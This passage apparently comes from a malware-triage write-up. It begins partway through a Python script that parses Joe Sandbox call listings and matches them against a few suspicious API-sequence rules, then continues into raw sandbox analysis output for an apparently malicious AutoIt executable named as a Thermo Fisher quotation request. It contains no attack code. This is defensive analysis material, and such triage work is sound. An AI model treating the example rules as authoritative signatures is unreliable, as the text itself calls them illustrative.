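            cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
            continue
        m = OPCODE_RE.match(line)
        if m:
            cur.opcode_id = m["id"]
    return blocks


# Ordered API subsequences worth a second look during triage.
# Names and patterns are this example's own choice, not Joe Sandbox signatures.
RULES = {
    "image loaded from file via OleLoadPicture":
        ("CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture"),
    "DACL rewritten on a window station/desktop object":
        ("GetSecurityDescriptorDacl", "AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"),
    "CLSID looked up in a remote machine's registry":
        ("WNetAddConnection2W", "RegConnectRegistryW", "RegOpenKeyExW", "CLSIDFromString"),
}


def is_subsequence(needle, haystack) -> bool:
    """True if every element of needle occurs in haystack in the same order (gaps allowed)."""
    it = iter(haystack)
    return all(any(x == y for y in it) for x in needle)


def tag_block(block: Block) -> List[str]:
    seq = block.direct()
    return [name for name, pat in RULES.items() if is_subsequence(pat, seq)]


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b.opcode_id[:16], b.modules(), tag_block(b))
```

Only direct calls feed the subsequence match; the `Part of subcall function` entries are kept on the `Call` record (with the callee address in `subcall`) so a rule can be extended to them deliberately rather than matching on calls that belong to another block.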
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-2391861430
                                                              • Opcode ID: 8539fdaa33a2b571c7f3e15cad6e54e8f509fb532ea55ff04ec1f11c6ca3d544
                                                              • Instruction ID: d64bc03618c80f6720257c7117dc845b2e4a6f6f377e9983b3e9e44499815082
                                                              • Opcode Fuzzy Hash: 8539fdaa33a2b571c7f3e15cad6e54e8f509fb532ea55ff04ec1f11c6ca3d544
                                                              • Instruction Fuzzy Hash: 6851BB71940119BACB58EBE0CD42EEFB77AAF09310F100169F401722A2EB706F59DFA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-3420473620
                                                              • Opcode ID: e0097568863ff6e50fab6d6384185d60e3b8a34d0c0ff00f5195feed75564580
                                                              • Instruction ID: 4ef1f18298d9058f4da0454d4b62bb7414640564d7fe9135a9194d0e13dcef6b
                                                              • Opcode Fuzzy Hash: e0097568863ff6e50fab6d6384185d60e3b8a34d0c0ff00f5195feed75564580
                                                              • Instruction Fuzzy Hash: 6251BE71940119BACB58EBE0DD42EEFB77AAF05300F100169F506722A2EB706F59CFA5
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: $Ek$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-373266013
                                                              • Opcode ID: 2803114618d44353a71d851da4bb991a9c643b2d15f89b0483f3c7bfbd5c0dd0
                                                              • Instruction ID: aee6f4a84feae9b21f9cf0fc94079a9cc31c1ef5e72093d95d8fe597808eb851
                                                              • Opcode Fuzzy Hash: 2803114618d44353a71d851da4bb991a9c643b2d15f89b0483f3c7bfbd5c0dd0
                                                              • Instruction Fuzzy Hash: 13413A7111025B8BDF54EF20D891AEB3767EF22340F145818EC651B392EB71EE8ACB64
                                                              APIs
                                                              • _memset.LIBCMT ref: 006455D7
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00645664
                                                              • GetMenuItemCount.USER32(006C1708), ref: 006456ED
                                                              • DeleteMenu.USER32(006C1708,00000005,00000000,000000F5,?,?), ref: 0064577D
                                                              • DeleteMenu.USER32(006C1708,00000004,00000000), ref: 00645785
                                                              • DeleteMenu.USER32(006C1708,00000006,00000000), ref: 0064578D
                                                              • DeleteMenu.USER32(006C1708,00000003,00000000), ref: 00645795
                                                              • GetMenuItemCount.USER32(006C1708), ref: 0064579D
                                                              • SetMenuItemInfoW.USER32(006C1708,00000004,00000000,00000030), ref: 006457D3
                                                              • GetCursorPos.USER32(?), ref: 006457DD
                                                              • SetForegroundWindow.USER32(00000000), ref: 006457E6
                                                              • TrackPopupMenuEx.USER32(006C1708,00000000,?,00000000,00000000,00000000), ref: 006457F9
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00645805
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: ae2ac73aa6b4d42d540cb5590ab9fcc29ecb641e8df379a3f13addb61fc90df5
                                                              • Instruction ID: 63fe603d80c4c2cb26b8128d8aaae588e74a17fe86aac6e502a78c392cdc8887
                                                              • Opcode Fuzzy Hash: ae2ac73aa6b4d42d540cb5590ab9fcc29ecb641e8df379a3f13addb61fc90df5
                                                              • Instruction Fuzzy Hash: 16710570640615BFEB209B14CC49FEABF67FF01368F240216F6166A2E2CB715C50DBA5
                                                              APIs
                                                              • _memset.LIBCMT ref: 0063A1DC
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0063A211
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0063A22D
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0063A249
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0063A273
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0063A29B
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063A2A6
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063A2AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1687751970-22481851
                                                              • Opcode ID: d53abf6083992b0c01d31b56c4ec1d0496249f6c7bfb0cadb68214458b3332a9
                                                              • Instruction ID: f36f47cf9d82e65734790623a64df825c4bc68082ff26bfffde2b3edb954f92b
                                                              • Opcode Fuzzy Hash: d53abf6083992b0c01d31b56c4ec1d0496249f6c7bfb0cadb68214458b3332a9
                                                              • Instruction Fuzzy Hash: AE410975C50229ABDB15EBA4DC95DEEB7BABF04300F004169F801A31A0DB709E05DBA0
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 006467FD
                                                              • __swprintf.LIBCMT ref: 0064680A
                                                                • Part of subcall function 0062172B: __woutput_l.LIBCMT ref: 00621784
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00646834
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00646840
                                                              • LockResource.KERNEL32(00000000), ref: 0064684D
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0064686D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0064687F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0064688E
                                                              • LockResource.KERNEL32(?), ref: 0064689A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006468F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                              • String ID: 5k
                                                              • API String ID: 1433390588-2623598330
                                                              • Opcode ID: 04ee6796bcc72118c245fcc66a4a7750c51ce97149419793e60d86f22b215f85
                                                              • Instruction ID: 0d1a8164125a422899d035e739622dea51040c55584aff357b8a8f9fa509dee4
                                                              • Opcode Fuzzy Hash: 04ee6796bcc72118c245fcc66a4a7750c51ce97149419793e60d86f22b215f85
                                                              • Instruction Fuzzy Hash: 0031AE71A0021AAFDB109F60ED54EFABBAAEF0A340B008525F902E6240E730DA11DB75
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006736F4,00000010,?,Bad directive syntax error,0069DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006425D6
                                                              • LoadStringW.USER32(00000000,?,006736F4,00000010), ref: 006425DD
                                                              • _wprintf.LIBCMT ref: 00642610
                                                              • __swprintf.LIBCMT ref: 00642632
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006426A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1080873982-4153970271
                                                              • Opcode ID: 51afd2bcec3d34749f21301c0789ceb5143963897b606690c82bbf0e46db039f
                                                              • Instruction ID: 78c30f9f44d435cb72a0abe701a49f6d094b991077036da7201ae5b5be636078
                                                              • Opcode Fuzzy Hash: 51afd2bcec3d34749f21301c0789ceb5143963897b606690c82bbf0e46db039f
                                                              • Instruction Fuzzy Hash: 2B217C7194022ABFCF15AB90CC1AEEF7B7ABF18304F000459F505661E2EA71AA58DF65
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00647B42
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00647B58
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00647B69
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00647B7B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00647B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: 484236d9f0f6922e669070eba519889613d495ef2b6a165ae1081691eb01237d
                                                              • Instruction ID: 1d319f872f744beee3a39497c431c39cd6706967a8a93741d9c4c219aea20856
                                                              • Opcode Fuzzy Hash: 484236d9f0f6922e669070eba519889613d495ef2b6a165ae1081691eb01237d
                                                              • Instruction Fuzzy Hash: 3011C4F068026979D724B761CC4ADFF7B7EEB91B10F01052DB411A61C1EFA01A89CAB4
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00647794
                                                                • Part of subcall function 0061DC38: timeGetTime.WINMM(?,75A8B400,006758AB), ref: 0061DC3C
                                                              • Sleep.KERNEL32(0000000A), ref: 006477C0
                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006477E4
                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00647806
                                                              • SetActiveWindow.USER32 ref: 00647825
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00647833
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00647852
                                                              • Sleep.KERNEL32(000000FA), ref: 0064785D
                                                              • IsWindow.USER32 ref: 00647869
                                                              • EndDialog.USER32(00000000), ref: 0064787A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 73a9ae757f282c0d3423424da5bb219f4a6f93512e537474afd281366971be94
                                                              • Instruction ID: 4688c9f64e7cf81f0ee88e1efa4a5455d2f5cd15b4f3c5e8899ae53d772533f3
                                                              • Opcode Fuzzy Hash: 73a9ae757f282c0d3423424da5bb219f4a6f93512e537474afd281366971be94
                                                              • Instruction Fuzzy Hash: FE216FB0204299BFE7005B20EC8DEB63F2BFB44348F00A529F50A823A2DB759D44DB75
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CoInitialize.OLE32(00000000), ref: 0065034B
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006503DE
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 006503F2
                                                              • CoCreateInstance.OLE32(0068DA8C,00000000,00000001,006B3CF8,?), ref: 0065043E
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006504AD
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00650505
                                                              • _memset.LIBCMT ref: 00650542
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0065057E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006505A1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 006505A8
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006505DF
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 006505E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 385d1042ece373bdd0a13557fc606249ba6b9afc648f8ef280db02b73d72ba34
                                                              • Instruction ID: 47995c1ad4594c5a3486af124ef51b0a14f804782a4e7d4158545507128fb354
                                                              • Opcode Fuzzy Hash: 385d1042ece373bdd0a13557fc606249ba6b9afc648f8ef280db02b73d72ba34
                                                              • Instruction Fuzzy Hash: F7B10875A00109AFDB04DFA4C888DAEBBBAFF48311F0485A9E905EB251DB30EE45CB54
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00642ED6
                                                              • SetKeyboardState.USER32(?), ref: 00642F41
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00642F61
                                                              • GetKeyState.USER32(000000A0), ref: 00642F78
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00642FA7
                                                              • GetKeyState.USER32(000000A1), ref: 00642FB8
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00642FE4
                                                              • GetKeyState.USER32(00000011), ref: 00642FF2
                                                              • GetAsyncKeyState.USER32(00000012), ref: 0064301B
                                                              • GetKeyState.USER32(00000012), ref: 00643029
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00643052
                                                              • GetKeyState.USER32(0000005B), ref: 00643060
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 8cb169c358c4bcac9286375bd73e0e257615ae5146a92f84b7770cc497e6b828
                                                              • Instruction ID: 755dd8e25e3d3b003c7a07f282e6cff250b3ccab49023312fe599f6f901c11dc
                                                              • Opcode Fuzzy Hash: 8cb169c358c4bcac9286375bd73e0e257615ae5146a92f84b7770cc497e6b828
                                                              • Instruction Fuzzy Hash: F3513A30A0479529FB35DBB488207EABFF65F11340F98458ED5C2473C2DA549B8CC762
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0063ED1E
                                                              • GetWindowRect.USER32(00000000,?), ref: 0063ED30
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0063ED8E
                                                              • GetDlgItem.USER32(?,00000002), ref: 0063ED99
                                                              • GetWindowRect.USER32(00000000,?), ref: 0063EDAB
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0063EE01
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0063EE0F
                                                              • GetWindowRect.USER32(00000000,?), ref: 0063EE20
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0063EE63
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0063EE71
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0063EE8E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0063EE9B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 56350a42f92f4e040171f3ed3c5fbbbdff6415ccf6aec0163b59bc9f4967a1fb
                                                              • Instruction ID: 64c52440f46a7a9bd89213b5a392e14c2269ce805890d9f1a545181a13fd4090
                                                              • Opcode Fuzzy Hash: 56350a42f92f4e040171f3ed3c5fbbbdff6415ccf6aec0163b59bc9f4967a1fb
                                                              • Instruction Fuzzy Hash: 43512271B00209BFDB18CF69CD85AAEBBB6EB88310F148229F519D72D0D7719D408B60
                                                              APIs
                                                                • Part of subcall function 0061B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0061B759,?,00000000,?,?,?,?,0061B72B,00000000,?), ref: 0061BA58
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0061B72B), ref: 0061B7F6
                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0061B88D
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0067D8A6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0067D8D7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0067D8EE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0061B72B,00000000,?,?,0061B2EF,?,?), ref: 0067D90A
                                                              • DeleteObject.GDI32(00000000), ref: 0067D91C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: df77ce492cffefc64f45064755761d9660d038fdcb83fe06bd954a0688cc835a
                                                              • Instruction ID: c5308efd30b53d23a0e9cdb3d991b8491ba7f1a71607a25f17ed840ea3ca77b1
                                                              • Opcode Fuzzy Hash: df77ce492cffefc64f45064755761d9660d038fdcb83fe06bd954a0688cc835a
                                                              • Instruction Fuzzy Hash: F361BA30500600DFDB259F1AD988BB5B7B7FF86726F18691DE0468AAB0C730A8D1DF90
                                                              APIs
                                                                • Part of subcall function 0061B526: GetWindowLongW.USER32(?,000000EB), ref: 0061B537
                                                              • GetSysColor.USER32(0000000F), ref: 0061B438
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
